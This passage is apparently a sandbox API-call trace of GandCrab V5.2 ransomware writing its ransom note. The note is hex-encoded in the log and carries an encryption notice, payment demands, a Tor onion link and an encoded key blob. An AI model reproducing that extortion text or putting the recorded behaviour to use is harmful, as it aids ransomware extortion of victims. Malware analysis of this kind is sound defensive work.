pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.037] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.037] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.037] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.037] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.038] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\\\TITWMVJL-DECRYPT.txt") returned 63 [0086.038] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0086.038] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0086.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: 